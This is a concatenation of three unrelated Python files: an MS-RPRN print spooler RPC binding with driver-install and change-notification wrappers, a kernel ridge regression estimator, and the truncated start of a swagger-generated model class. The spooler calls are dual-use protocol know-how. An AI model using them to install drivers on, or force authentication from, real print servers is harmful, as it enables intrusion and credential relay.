PRINTER_ALL_ACCESS = 0x000F000C
PRINTER_EXECUTE = 0x00020008
PRINTER_READ = 0x00020008
PRINTER_WRITE = 0x00020008
SERVER_ACCESS_ADMINISTER = 0x00000001
SERVER_ACCESS_ENUMERATE = 0x00000002
SERVER_ALL_ACCESS = 0x000F0003
SERVER_EXECUTE = 0x00020002
SERVER_READ = 0x00020002
SERVER_WRITE = 0x00020003
SPECIFIC_RIGHTS_ALL = 0x0000FFFF
STANDARD_RIGHTS_ALL = 0x001F0000
STANDARD_RIGHTS_EXECUTE = 0x00020000
STANDARD_RIGHTS_READ = 0x00020000
STANDARD_RIGHTS_REQUIRED = 0x000F0000
STANDARD_RIGHTS_WRITE = 0x00020000
SYNCHRONIZE = 0x00100000
DELETE = 0x00010000
READ_CONTROL = 0x00020000
WRITE_DAC = 0x00040000
WRITE_OWNER = 0x00080000
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
GENERIC_EXECUTE = 0x20000000
GENERIC_ALL = 0x10000000
# 2.2.3.6.1 Printer Change Flags for Use with a Printer Handle
PRINTER_CHANGE_SET_PRINTER = 0x00000002
PRINTER_CHANGE_DELETE_PRINTER = 0x00000004
PRINTER_CHANGE_PRINTER = 0x000000FF
PRINTER_CHANGE_ADD_JOB = 0x00000100
PRINTER_CHANGE_SET_JOB = 0x00000200
PRINTER_CHANGE_DELETE_JOB = 0x00000400
PRINTER_CHANGE_WRITE_JOB = 0x00000800
PRINTER_CHANGE_JOB = 0x0000FF00
PRINTER_CHANGE_SET_PRINTER_DRIVER = 0x20000000
PRINTER_CHANGE_TIMEOUT = 0x80000000
PRINTER_CHANGE_ALL = 0x7777FFFF
PRINTER_CHANGE_ALL_2 = 0x7F77FFFF
# 2.2.3.6.2 Printer Change Flags for Use with a Server Handle
PRINTER_CHANGE_ADD_PRINTER_DRIVER = 0x10000000
PRINTER_CHANGE_DELETE_PRINTER_DRIVER = 0x40000000
PRINTER_CHANGE_PRINTER_DRIVER = 0x70000000
PRINTER_CHANGE_ADD_FORM = 0x00010000
PRINTER_CHANGE_DELETE_FORM = 0x00040000
PRINTER_CHANGE_SET_FORM = 0x00020000
PRINTER_CHANGE_FORM = 0x00070000
PRINTER_CHANGE_ADD_PORT = 0x00100000
PRINTER_CHANGE_CONFIGURE_PORT = 0x00200000
PRINTER_CHANGE_DELETE_PORT = 0x00400000
PRINTER_CHANGE_PORT = 0x00700000
PRINTER_CHANGE_ADD_PRINT_PROCESSOR = 0x01000000
PRINTER_CHANGE_DELETE_PRINT_PROCESSOR = 0x04000000
PRINTER_CHANGE_PRINT_PROCESSOR = 0x07000000
PRINTER_CHANGE_ADD_PRINTER = 0x00000001
PRINTER_CHANGE_FAILED_CONNECTION_PRINTER = 0x00000008
PRINTER_CHANGE_SERVER = 0x08000000
# 2.2.3.7 Printer Enumeration Flags
PRINTER_ENUM_LOCAL = 0x00000002
PRINTER_ENUM_CONNECTIONS = 0x00000004
PRINTER_ENUM_NAME = 0x00000008
PRINTER_ENUM_REMOTE = 0x00000010
PRINTER_ENUM_SHARED = 0x00000020
PRINTER_ENUM_NETWORK = 0x00000040
PRINTER_ENUM_EXPAND = 0x00004000
PRINTER_ENUM_CONTAINER = 0x00008000
PRINTER_ENUM_ICON1 = 0x00010000
PRINTER_ENUM_ICON2 = 0x00020000
PRINTER_ENUM_ICON3 = 0x00040000
PRINTER_ENUM_ICON8 = 0x00800000
PRINTER_ENUM_HIDE = 0x01000000
# 2.2.3.8 Printer Notification Values
PRINTER_NOTIFY_CATEGORY_2D = 0x00000000
PRINTER_NOTIFY_CATEGORY_ALL = 0x00010000
PRINTER_NOTIFY_CATEGORY_3D = 0x00020000
# 3.1.4.4.8 RpcAddPrinterDriverEx Values
APD_STRICT_UPGRADE = 0x00000001
APD_STRICT_DOWNGRADE = 0x00000002
APD_COPY_ALL_FILES = 0x00000004
APD_COPY_NEW_FILES = 0x00000008
APD_COPY_FROM_DIRECTORY = 0x00000010
APD_DONT_COPY_FILES_TO_CLUSTER = 0x00001000
APD_COPY_TO_ALL_SPOOLERS = 0x00002000
APD_INSTALL_WARNED_DRIVER = 0x00008000
APD_RETURN_BLOCKING_STATUS_CODE = 0x00010000
################################################################################
# STRUCTURES
################################################################################
# 2.2.1.1.4 PRINTER_HANDLE
class PRINTER_HANDLE(NDRSTRUCT):
    """[MS-RPRN] 2.2.1.1.4 PRINTER_HANDLE: a 20-byte RPC context handle."""
    structure = (
        ('Data','20s=b""'),
    )
    def getAlignment(self):
        # Context handles align to the pointer size of the transfer syntax.
        if self._isNDR64 is True:
            return 8
        else:
            return 4
# 2.2.1.2.1 DEVMODE_CONTAINER
class BYTE_ARRAY(NDRUniConformantArray):
    """Conformant array of raw bytes (one 'c' item per byte)."""
    item = 'c'
class PBYTE_ARRAY(NDRPOINTER):
    """Pointer to a BYTE_ARRAY."""
    referent = (
        ('Data', BYTE_ARRAY),
    )
class DEVMODE_CONTAINER(NDRSTRUCT):
    """[MS-RPRN] 2.2.1.2.1 DEVMODE_CONTAINER: byte count + optional DEVMODE blob."""
    structure = (
        ('cbBuf',DWORD),
        ('pDevMode',PBYTE_ARRAY),
    )
# 2.2.1.11.1 SPLCLIENT_INFO_1
class SPLCLIENT_INFO_1(NDRSTRUCT):
    """[MS-RPRN] 2.2.1.11.1 SPLCLIENT_INFO_1: client machine/user/version info."""
    structure = (
        ('dwSize',DWORD),
        ('pMachineName',LPWSTR),
        ('pUserName',LPWSTR),
        ('dwBuildNum',DWORD),
        ('dwMajorVersion',DWORD),
        ('dwMinorVersion',DWORD),
        ('wProcessorArchitecture',USHORT),
    )
class PSPLCLIENT_INFO_1(NDRPOINTER):
    """Pointer to a SPLCLIENT_INFO_1."""
    referent = (
        ('Data', SPLCLIENT_INFO_1),
    )
class SPLCLIENT_INFO_2(NDRSTRUCT):
    """[MS-RPRN] 2.2.1.11.2 SPLCLIENT_INFO_2: reserved/unused 64-bit field."""
    structure = (
        ('notUsed',ULONGLONG),
    )
class PSPLCLIENT_INFO_2(NDRPOINTER):
    """Pointer to a SPLCLIENT_INFO_2."""
    referent = (
        ('Data', SPLCLIENT_INFO_2),
    )
# 2.2.1.11.3 SPLCLIENT_INFO_3
class SPLCLIENT_INFO_3(NDRSTRUCT):
    """[MS-RPRN] 2.2.1.11.3 SPLCLIENT_INFO_3.

    Fix: the original tuple listed ('dwFlags',DWORD) twice; per the
    protocol specification the second DWORD field is 'dwSize'. Duplicate
    field names in an NDRSTRUCT tuple make both wire fields share one
    stored value, so the marshalled structure could never carry distinct
    dwFlags/dwSize values.
    """
    structure = (
        ('cbSize',UINT),
        ('dwFlags',DWORD),
        ('dwSize',DWORD),
        ('pMachineName',LPWSTR),
        ('pUserName',LPWSTR),
        ('dwBuildNum',DWORD),
        ('dwMajorVersion',DWORD),
        ('dwMinorVersion',DWORD),
        ('wProcessorArchitecture',USHORT),
        ('hSplPrinter',ULONGLONG),
    )
class PSPLCLIENT_INFO_3(NDRPOINTER):
    """Pointer to a SPLCLIENT_INFO_3."""
    referent = (
        ('Data', SPLCLIENT_INFO_3),
    )
# 2.2.1.5.1 DRIVER_INFO_1
class DRIVER_INFO_1(NDRSTRUCT):
    """[MS-RPRN] 2.2.1.5.1 DRIVER_INFO_1: driver name only."""
    structure = (
        ('pName', STRING_HANDLE ),
    )
class PDRIVER_INFO_1(NDRPOINTER):
    """Pointer to a DRIVER_INFO_1."""
    referent = (
        ('Data', DRIVER_INFO_1),
    )
class DRIVER_INFO_2(NDRSTRUCT):
    """[MS-RPRN] 2.2.1.5.2 DRIVER_INFO_2: driver name plus file paths."""
    structure = (
        ('cVersion',DWORD),
        ('pName', LPWSTR),
        ('pEnvironment', LPWSTR),
        ('pDriverPath', LPWSTR),
        ('pDataFile', LPWSTR),
        ('pConfigFile', LPWSTR),
    )
class PDRIVER_INFO_2(NDRPOINTER):
    """Pointer to a DRIVER_INFO_2."""
    referent = (
        ('Data', DRIVER_INFO_2),
    )
# 2.2.1.2.3 DRIVER_CONTAINER
class DRIVER_INFO_UNION(NDRUNION):
    """Level-discriminated union of DRIVER_INFO_* pointers (tag = Level)."""
    commonHdr = (
        ('tag', ULONG),
    )
    union = {
        1 : ('pNotUsed', PDRIVER_INFO_1),
        2 : ('Level2', PDRIVER_INFO_2),
    }
class DRIVER_CONTAINER(NDRSTRUCT):
    """[MS-RPRN] 2.2.1.2.3 DRIVER_CONTAINER: Level selector + matching info union."""
    structure = (
        ('Level',DWORD),
        ('DriverInfo',DRIVER_INFO_UNION),
    )
class CLIENT_INFO_UNION(NDRUNION):
    """Level-discriminated union of SPLCLIENT_INFO_* pointers (tag = Level)."""
    commonHdr = (
        ('tag', ULONG),
    )
    union = {
        1 : ('pClientInfo1', PSPLCLIENT_INFO_1),
        2 : ('pNotUsed1', PSPLCLIENT_INFO_2),
        3 : ('pNotUsed2', PSPLCLIENT_INFO_3),
    }
class SPLCLIENT_CONTAINER(NDRSTRUCT):
    """[MS-RPRN] 2.2.1.2.14 SPLCLIENT_CONTAINER: Level selector + client info union."""
    structure = (
        ('Level',DWORD),
        ('ClientInfo',CLIENT_INFO_UNION),
    )
# 2.2.1.13.2 RPC_V2_NOTIFY_OPTIONS_TYPE
class USHORT_ARRAY(NDRUniConformantArray):
    """Conformant array of little-endian unsigned shorts."""
    item = '<H'
class PUSHORT_ARRAY(NDRPOINTER):
    """Pointer to a USHORT_ARRAY."""
    referent = (
        ('Data', USHORT_ARRAY),
    )
class RPC_V2_NOTIFY_OPTIONS_TYPE(NDRSTRUCT):
    """[MS-RPRN] 2.2.1.13.2 RPC_V2_NOTIFY_OPTIONS_TYPE: one notification category
    plus the member fields (pFields) to watch."""
    structure = (
        ('Type',USHORT),
        ('Reserved0',USHORT),
        ('Reserved1',DWORD),
        ('Reserved2',DWORD),
        ('Count',DWORD),
        ('pFields',PUSHORT_ARRAY),
    )
class PRPC_V2_NOTIFY_OPTIONS_TYPE_ARRAY(NDRPOINTER):
    """Pointer to an RPC_V2_NOTIFY_OPTIONS_TYPE."""
    referent = (
        ('Data', RPC_V2_NOTIFY_OPTIONS_TYPE),
    )
class RPC_V2_NOTIFY_OPTIONS(NDRSTRUCT):
    """[MS-RPRN] 2.2.1.13.1 RPC_V2_NOTIFY_OPTIONS: versioned set of notify types."""
    structure = (
        ('Version',DWORD),
        ('Reserved',DWORD),
        ('Count',DWORD),
        ('pTypes',PRPC_V2_NOTIFY_OPTIONS_TYPE_ARRAY),
    )
class PRPC_V2_NOTIFY_OPTIONS(NDRPOINTER):
    """Pointer to an RPC_V2_NOTIFY_OPTIONS."""
    referent = (
        ('Data', RPC_V2_NOTIFY_OPTIONS),
    )
################################################################################
# RPC CALLS
################################################################################
# 3.1.4.2.1 RpcEnumPrinters (Opnum 0)
class RpcEnumPrinters(NDRCALL):
    """Request for RpcEnumPrinters (opnum 0): enumerate printers/servers."""
    opnum = 0
    structure = (
        ('Flags', DWORD),
        ('Name', STRING_HANDLE),
        ('Level', DWORD),
        ('pPrinterEnum', PBYTE_ARRAY),
        ('cbBuf', DWORD),
    )
class RpcEnumPrintersResponse(NDRCALL):
    """Response: enumerated blob, size needed, entry count, status."""
    structure = (
        ('pPrinterEnum', PBYTE_ARRAY),
        ('pcbNeeded', DWORD),
        ('pcReturned', DWORD),
        ('ErrorCode', ULONG),
    )
# 3.1.4.2.2 RpcOpenPrinter (Opnum 1)
class RpcOpenPrinter(NDRCALL):
    """Request for RpcOpenPrinter (opnum 1): open a printer/server handle."""
    opnum = 1
    structure = (
        ('pPrinterName', STRING_HANDLE),
        ('pDatatype', LPWSTR),
        ('pDevModeContainer', DEVMODE_CONTAINER),
        ('AccessRequired', DWORD),
    )
class RpcOpenPrinterResponse(NDRCALL):
    """Response: the opened PRINTER_HANDLE and status."""
    structure = (
        ('pHandle', PRINTER_HANDLE),
        ('ErrorCode', ULONG),
    )
# 3.1.4.2.9 RpcClosePrinter (Opnum 29)
class RpcClosePrinter(NDRCALL):
    """Request for RpcClosePrinter (opnum 29)."""
    opnum = 29
    structure = (
        ('phPrinter', PRINTER_HANDLE),
    )
class RpcClosePrinterResponse(NDRCALL):
    """Response: the (zeroed) handle and status."""
    structure = (
        ('phPrinter', PRINTER_HANDLE),
        ('ErrorCode', ULONG),
    )
# 3.1.4.10.4 RpcRemoteFindFirstPrinterChangeNotificationEx (Opnum 65)
class RpcRemoteFindFirstPrinterChangeNotificationEx(NDRCALL):
    """Request for RpcRemoteFindFirstPrinterChangeNotificationEx (opnum 65):
    register for change notifications delivered back to pszLocalMachine."""
    opnum = 65
    structure = (
        ('hPrinter', PRINTER_HANDLE),
        ('fdwFlags', DWORD),
        ('fdwOptions', DWORD),
        ('pszLocalMachine', LPWSTR),
        ('dwPrinterLocal', DWORD),
        ('pOptions', PRPC_V2_NOTIFY_OPTIONS),
    )
class RpcRemoteFindFirstPrinterChangeNotificationExResponse(NDRCALL):
    """Response: status only."""
    structure = (
        ('ErrorCode', ULONG),
    )
# 3.1.4.2.14 RpcOpenPrinterEx (Opnum 69)
class RpcOpenPrinterEx(NDRCALL):
    """Request for RpcOpenPrinterEx (opnum 69): RpcOpenPrinter + client info."""
    opnum = 69
    structure = (
        ('pPrinterName', STRING_HANDLE),
        ('pDatatype', LPWSTR),
        ('pDevModeContainer', DEVMODE_CONTAINER),
        ('AccessRequired', DWORD),
        ('pClientInfo', SPLCLIENT_CONTAINER),
    )
class RpcOpenPrinterExResponse(NDRCALL):
    """Response: the opened PRINTER_HANDLE and status."""
    structure = (
        ('pHandle', PRINTER_HANDLE),
        ('ErrorCode', ULONG),
    )
# 3.1.4.4.8 RpcAddPrinterDriverEx (Opnum 89)
class RpcAddPrinterDriverEx(NDRCALL):
    """Request for RpcAddPrinterDriverEx (opnum 89): install a printer driver."""
    opnum = 89
    structure = (
        ('pName', STRING_HANDLE),
        ('pDriverContainer', DRIVER_CONTAINER),
        ('dwFileCopyFlags', DWORD),
    )
class RpcAddPrinterDriverExResponse(NDRCALL):
    """Response: status only."""
    structure = (
        ('ErrorCode', ULONG),
    )
################################################################################
# OPNUMs and their corresponding structures
################################################################################
# Map of opnum -> (request class, response class) used by the DCERPC layer
# to pair calls with their responses.
OPNUMS = {
 0 : (RpcEnumPrinters, RpcEnumPrintersResponse),
 1 : (RpcOpenPrinter, RpcOpenPrinterResponse),
 29 : (RpcClosePrinter, RpcClosePrinterResponse),
 65 : (RpcRemoteFindFirstPrinterChangeNotificationEx, RpcRemoteFindFirstPrinterChangeNotificationExResponse),
 69 : (RpcOpenPrinterEx, RpcOpenPrinterExResponse),
 89 : (RpcAddPrinterDriverEx, RpcAddPrinterDriverExResponse),
}
################################################################################
# HELPER FUNCTIONS
################################################################################
def checkNullString(string):
    """Return *string* guaranteed to end with a NUL terminator.

    NDR wide strings on the wire must be NUL-terminated; NULL sentinels
    are passed through untouched.
    """
    if string == NULL:
        return string
    return string if string.endswith('\x00') else string + '\x00'
def hRpcOpenPrinter(dce, printerName, pDatatype = NULL, pDevModeContainer = NULL, accessRequired = SERVER_READ):
    """
    RpcOpenPrinter retrieves a handle for a printer, port, port monitor, print job, or print server.
    Full Documentation: https://msdn.microsoft.com/en-us/library/cc244808.aspx
    :param DCERPC_v5 dce: a connected DCE instance.
    :param string printerName: A string for a printer connection, printer object, server object, job object, port
    object, or port monitor object. This MUST be a Domain Name System (DNS), NetBIOS, Internet Protocol version 4
    (IPv4), Internet Protocol version 6 (IPv6), or Universal Naming Convention (UNC) name that remote procedure
    call (RPC) binds to, and it MUST uniquely identify a print server on the network.
    :param string pDatatype: A string that specifies the data type to be associated with the printer handle.
    :param DEVMODE_CONTAINER pDevModeContainer: A DEVMODE_CONTAINER structure. This parameter MUST adhere to the specification in
    DEVMODE_CONTAINER Parameters (section 3.1.4.1.8.1).
    :param int accessRequired: The access level that the client requires for interacting with the object to which a
    handle is being opened.
    :return: a RpcOpenPrinterResponse instance, raises DCERPCSessionError on error.
    """
    request = RpcOpenPrinter()
    # The printer name must be NUL-terminated on the wire.
    request['pPrinterName'] = checkNullString(printerName)
    request['pDatatype'] = pDatatype
    # With no DEVMODE supplied, still marshal a valid (empty) container:
    # only its embedded pointer is set to NULL.
    if pDevModeContainer is NULL:
        request['pDevModeContainer']['pDevMode'] = NULL
    else:
        request['pDevModeContainer'] = pDevModeContainer
    request['AccessRequired'] = accessRequired
    return dce.request(request)
def hRpcClosePrinter(dce, phPrinter):
    """
    RpcClosePrinter closes a handle to a printer object, server object, job object, or port object.
    Full Documentation: https://msdn.microsoft.com/en-us/library/cc244768.aspx
    :param DCERPC_v5 dce: a connected DCE instance.
    :param PRINTER_HANDLE phPrinter: A handle to a printer object, server object, job object, or port object.
    :return: a RpcClosePrinterResponse instance, raises DCERPCSessionError on error.
    """
    call = RpcClosePrinter()
    call['phPrinter'] = phPrinter
    return dce.request(call)
def hRpcOpenPrinterEx(dce, printerName, pDatatype=NULL, pDevModeContainer=NULL, accessRequired=SERVER_READ,
                      pClientInfo=NULL):
    """
    RpcOpenPrinterEx retrieves a handle for a printer, port, port monitor, print job, or print server
    Full Documentation: https://msdn.microsoft.com/en-us/library/cc244809.aspx
    :param DCERPC_v5 dce: a connected DCE instance.
    :param string printerName: A string for a printer connection, printer object, server object, job object, port
    object, or port monitor object. This MUST be a Domain Name System (DNS), NetBIOS, Internet Protocol version 4
    (IPv4), Internet Protocol version 6 (IPv6), or Universal Naming Convention (UNC) name that remote procedure
    call (RPC) binds to, and it MUST uniquely identify a print server on the network.
    :param string pDatatype: A string that specifies the data type to be associated with the printer handle.
    :param DEVMODE_CONTAINER pDevModeContainer: A DEVMODE_CONTAINER structure. This parameter MUST adhere to the specification in
    DEVMODE_CONTAINER Parameters (section 3.1.4.1.8.1).
    :param int accessRequired: The access level that the client requires for interacting with the object to which a
    handle is being opened.
    :param SPLCLIENT_CONTAINER pClientInfo: This parameter MUST adhere to the specification in SPLCLIENT_CONTAINER Parameters.
    :raises Exception: if pClientInfo is NULL (the call requires client info).
    :return: a RpcOpenPrinterExResponse instance, raises DCERPCSessionError on error.
    """
    request = RpcOpenPrinterEx()
    # The printer name must be NUL-terminated on the wire.
    request['pPrinterName'] = checkNullString(printerName)
    request['pDatatype'] = pDatatype
    # With no DEVMODE supplied, still marshal a valid (empty) container.
    if pDevModeContainer is NULL:
        request['pDevModeContainer']['pDevMode'] = NULL
    else:
        request['pDevModeContainer'] = pDevModeContainer
    request['AccessRequired'] = accessRequired
    if pClientInfo is NULL:
        raise Exception('pClientInfo cannot be NULL')
    request['pClientInfo'] = pClientInfo
    return dce.request(request)
def hRpcRemoteFindFirstPrinterChangeNotificationEx(dce, hPrinter, fdwFlags, fdwOptions=0, pszLocalMachine=NULL,
                                                   dwPrinterLocal=0, pOptions=NULL):
    """
    creates a remote change notification object that monitors changes to printer objects and sends change notifications
    to a print client using either RpcRouterReplyPrinter (section 3.2.4.1.2) or RpcRouterReplyPrinterEx (section 3.2.4.1.4)
    Full Documentation: https://msdn.microsoft.com/en-us/library/cc244813.aspx
    :param DCERPC_v5 dce: a connected DCE instance.
    :param PRINTER_HANDLE hPrinter: A handle to a printer or server object.
    :param int fdwFlags: Flags that specify the conditions that are required for a change notification object to enter a signaled state.
    :param int fdwOptions: The category of printers for which change notifications are returned.
    :param string pszLocalMachine: A string that represents the name of the client computer.
    :param int dwPrinterLocal: An implementation-specific unique value that MUST be sufficient for the client to determine
    whether a call to RpcReplyOpenPrinter by the server is associated with the hPrinter parameter in this call.
    :param RPC_V2_NOTIFY_OPTIONS pOptions: An RPC_V2_NOTIFY_OPTIONS structure that specifies printer or job members that the client listens to for notifications.
    :raises Exception: if pszLocalMachine is NULL (the server needs a client name to call back).
    :return: a RpcRemoteFindFirstPrinterChangeNotificationExResponse instance, raises DCERPCSessionError on error.
    """
    request = RpcRemoteFindFirstPrinterChangeNotificationEx()
    request['hPrinter'] = hPrinter
    request['fdwFlags'] = fdwFlags
    request['fdwOptions'] = fdwOptions
    request['dwPrinterLocal'] = dwPrinterLocal
    if pszLocalMachine is NULL:
        raise Exception('pszLocalMachine cannot be NULL')
    # Machine name must be NUL-terminated on the wire.
    request['pszLocalMachine'] = checkNullString(pszLocalMachine)
    request['pOptions'] = pOptions
    return dce.request(request)
def hRpcEnumPrinters(dce, flags, name = NULL, level = 1):
    """
    RpcEnumPrinters enumerates available printers, print servers, domains, or print providers.
    Full Documentation: https://msdn.microsoft.com/en-us/library/cc244794.aspx
    :param DCERPC_v5 dce: a connected DCE instance.
    :param int flags: The types of print objects that this method enumerates. The value of this parameter is the
    result of a bitwise OR of one or more of the Printer Enumeration Flags (section 2.2.3.7).
    :param string name: NULL or a server name parameter as specified in Printer Server Name Parameters (section 3.1.4.1.4).
    :param level: The level of printer information structure.
    :return: a RpcEnumPrintersResponse instance, raises DCERPCSessionError on error.
    """
    # Two-pass pattern: first call with an empty buffer to learn the
    # required size (the server answers ERROR_INSUFFICIENT_BUFFER and
    # reports pcbNeeded), then repeat the call with a buffer of that size.
    request = RpcEnumPrinters()
    request['Flags'] = flags
    request['Name'] = name
    request['pPrinterEnum'] = NULL
    request['Level'] = level
    bytesNeeded = 0
    try:
        dce.request(request)
    except DCERPCSessionError as e:
        # Any error other than ERROR_INSUFFICIENT_BUFFER is a real failure.
        if str(e).find('ERROR_INSUFFICIENT_BUFFER') < 0:
            raise
        bytesNeeded = e.get_packet()['pcbNeeded']
    request = RpcEnumPrinters()
    request['Flags'] = flags
    request['Name'] = name
    request['Level'] = level
    request['cbBuf'] = bytesNeeded
    # Placeholder buffer of the required size; the server overwrites it.
    request['pPrinterEnum'] = b'a' * bytesNeeded
    return dce.request(request)
def hRpcAddPrinterDriverEx(dce, pName, pDriverContainer, dwFileCopyFlags):
    """
    RpcAddPrinterDriverEx installs a printer driver on the print server.
    Full Documentation: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/b96cc497-59e5-4510-ab04-5484993b259b
    :param DCERPC_v5 dce: a connected DCE instance.
    :param pName: print server name (NUL-terminated automatically).
    :param pDriverContainer: a DRIVER_CONTAINER describing the driver to install.
    :param dwFileCopyFlags: bitwise OR of APD_* flags controlling file copying.
    :return: a RpcAddPrinterDriverExResponse instance, raises DCERPCSessionError on error.
    """
    call = RpcAddPrinterDriverEx()
    call['pName'] = checkNullString(pName)
    call['pDriverContainer'] = pDriverContainer
    call['dwFileCopyFlags'] = dwFileCopyFlags
    return dce.request(call)
|
<gh_stars>1-10
import numpy as np
from kernellib.kernel_approximation import RandomizedNystrom, RandomFourierFeatures, FastFood
from sklearn.base import BaseEstimator, RegressorMixin
from sklearn.kernel_approximation import Nystroem, RBFSampler
from sklearn.utils import check_array, check_X_y, check_random_state
from sklearn.utils.validation import check_is_fitted
from scipy.linalg import cholesky, cho_solve, solve
from sklearn.linear_model.ridge import _solve_cholesky_kernel
class RKSKernelRidge(BaseEstimator, RegressorMixin):
    """Kernel ridge regression using a Random Kitchen Sinks approximation.

    The RBF kernel is approximated with complex random Fourier features
    exp(1j * X @ w.T), with w drawn i.i.d. Gaussian scaled by 1/sigma.

    Parameters
    ----------
    n_components : int, number of random features.
    alpha : float, ridge regularization strength.
    sigma : float, kernel length scale.
    random_state : int/RandomState/None, seed for the random projection.

    Author: <NAME>
    Email : <EMAIL>
    <EMAIL>
    Date : 3rd - August, 2018
    """
    def __init__(self, n_components=10, alpha=1e-3, sigma=1.0,
                 random_state=None):
        self.n_components = n_components
        self.alpha = alpha
        self.sigma = sigma
        self.random_state = random_state
    def fit(self, X, y):
        """Fits the Random Kitchen Sinks Kernel Ridge Regression Model.
        Parameters
        ----------
        X : {array-like, sparse matrix}, shape = [n_samples, n_features]
        Training data
        y : array-like, shape = [n_samples] or [n_samples, n_targets]
        Target Values
        sample_weight : float or array-like of shape [n_samples]
        Individual weights for each sample, ignored if None is passed.
        Returns
        -------
        self : returns an instance of self
        """
        # Convert the data
        X, y = check_X_y(X, y, accept_sparse=("csr", "csc"), multi_output=True,
                         y_numeric=True)
        # iniate randomization
        rng = check_random_state(self.random_state)
        # Random projection matrix, shape (n_components, n_features).
        self.w = np.sqrt(1 / (self.sigma**2)) * rng.randn(self.n_components, X.shape[1])
        # Complex feature map, shape (n_samples, n_components).
        self.L = np.exp(1j * np.dot(X, self.w.T))
        # Regularized Gram matrix in feature space (n_components x n_components).
        # NOTE(review): plain transpose is used on the complex features, not the
        # conjugate transpose -- confirm this is the intended formulation.
        K = np.dot(self.L.T, self.L) + self.alpha * np.eye(self.n_components)
        ravel = False
        if len(y.shape) == 1:
            y = y.reshape(-1, 1)
            ravel = True
        #
        # self.dual_coef_ = _solve_cholesky_kernel(K, np.dot(self.L.T, y), alpha)
        #
        # if ravel:
        #     self.dual_coef_ = self.dual_coef_.ravel()
        self.dual_coef_ = np.linalg.solve(K , np.dot(self.L.T, y))
        if ravel:
            self.dual_coef_ = self.dual_coef_.ravel()
        self.X_fit_ = X
        return self
    def predict(self, X, return_real=True):
        """Predict using the RKS Kernel Model.

        Projects X with the fitted random matrix and applies the dual
        coefficients; by default only the real part is returned.
        """
        check_is_fitted(self, ["X_fit_", "dual_coef_"])
        X = check_array(X)
        K = np.exp(1j * np.dot(X, self.w.T))
        if return_real:
            return np.real(np.dot(K, self.dual_coef_))
        else:
            return np.dot(K, self.dual_coef_)
class KernelRidge(BaseEstimator, RegressorMixin):
    """Kernel Ridge Regression with kernel Approximations.
    Large scale
    Parameters
    ----------
    alpha : {float},
    The noise parameter for the outputs according to the KRR
    formulation.
    n_components : int, default=10
    The number of components (subset) to keep from the original
    data.
    sigma : float, default=None
    The length scale parameter
    approximation : str, one of 'rff', 'rks', 'nystrom', 'fastfood',
    'rnystrom' -- selects the feature-map backend (see
    _kernel_approximation).
    Author: <NAME>
    Email : <EMAIL>
    <EMAIL>
    Date : 3rd - August, 2018
    """
    def __init__(self, n_components=10, alpha=1e-3, sigma=None,
                 random_state=None, approximation='nystrom',
                 k_rank=10, kernel='rbf', trade_off='acc'):
        self.n_components = n_components
        self.alpha = alpha
        self.sigma = sigma
        self.random_state = random_state
        self.approximation = approximation
        self.k_rank = k_rank
        self.n_components = n_components
        self.kernel = kernel
        self.trade_off = trade_off
    def fit(self, X, y):
        """Fit the model: build the approximate feature map, then solve
        the regularized least-squares problem in feature space."""
        # Convert the data
        X, y = check_X_y(X, y, accept_sparse=("csr", "csc"), multi_output=True,
                         y_numeric=True)
        # iniate randomization
        rng = check_random_state(self.random_state)
        # Sigma
        # NOTE(review): mutating self.sigma inside fit breaks sklearn's
        # clone/get_params contract -- consider a local default instead.
        if self.sigma is None:
            self.sigma = 1.0
        # Kernel Approximation Step: L has shape (n_samples, n_components).
        self.L = self._kernel_approximation(X)
        # Solve for weights
        K = np.dot(self.L.T, self.L)
        alpha = np.atleast_1d(self.alpha)
        ravel = False
        if len(y.shape) == 1:
            y = y.reshape(-1, 1)
            ravel = True
        if self.approximation == 'rnystrom':
            # Explicit regularized solve for the randomized Nystrom features.
            self.dual_coef_ = solve(K + alpha * np.eye(K.shape[0]), np.dot(self.L.T, y))
        else:
            self.dual_coef_ = _solve_cholesky_kernel(K, np.dot(self.L.T, y), alpha)
        if ravel:
            self.dual_coef_ = self.dual_coef_.ravel()
        self.X_fit_ = X
        return self
    def _kernel_approximation(self, X):
        """Fit the configured feature-map transformer and return the
        transformed training features.

        NOTE(review): gamma is set to 1/sqrt(2*sigma^2); the usual RBF
        convention is gamma = 1/(2*sigma^2) -- confirm intended.
        """
        # Random Fourier Features
        if self.approximation == 'rff':
            self.trans = RandomFourierFeatures(
                n_components=self.n_components,
                gamma=1 / np.sqrt(2 * self.sigma**2)
            )
        # RBF Sampler (Variant of Random Kitchen Sinks)
        elif self.approximation == 'rks':
            self.trans = RBFSampler(
                gamma=1 / np.sqrt(2 * self.sigma**2),
                n_components=self.n_components,
                random_state=self.random_state)
        # Nystrom Approximation
        elif self.approximation == 'nystrom':
            self.trans = Nystroem(
                kernel=self.kernel,
                gamma=1 / np.sqrt(2 * self.sigma**2),
                n_components=self.n_components,
                random_state=self.random_state
            )
        # Fast Food Approximation
        elif self.approximation == 'fastfood':
            self.trans = FastFood(
                sigma=self.sigma,
                n_components=self.n_components,
                tradeoff_mem_accuracy=self.trade_off,
                random_state=self.random_state
            )
        # Randomized Nystrom Approximation
        elif self.approximation == 'rnystrom':
            self.trans = RandomizedNystrom(
                kernel=self.kernel,
                sigma=self.sigma,
                n_components=self.n_components,
                k_rank=self.k_rank,
                random_state=self.random_state
            )
        else:
            raise ValueError('Unrecognized algorithm.')
        self.trans.fit(X)
        return self.trans.transform(X)
    def predict(self, X):
        """Predict using the kernel ridge model
        Parameters
        ----------
        X : {array-like, sparse matrix}, shape = [n_samples, n_features]
        Samples.
        Returns
        -------
        Predictions : array, shape = [n_samples] or [n_samples, n_targets]
        Returns predicted values.
        """
        check_is_fitted(self, ["X_fit_", "dual_coef_"])
        X = check_array(X)
        K = self.trans.transform(X)
        return np.real(np.dot(K, self.dual_coef_))
# ---
# coding: utf-8
"""
EXACT - API
API to interact with the EXACT Server # noqa: E501
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
from enum import Enum, IntEnum
import six
class Image(object):
    """NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.
    """
    """
    Attributes:
      swagger_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    # Origin of the image file on the EXACT server.
    class ImageSourceTypes(IntEnum):
        DEFAULT = 0
        SERVER_GENERATED = 1
        FILE_LINK = 2
    swagger_types = {
        'id': 'int',
        'name': 'str',
        'filename': 'str',
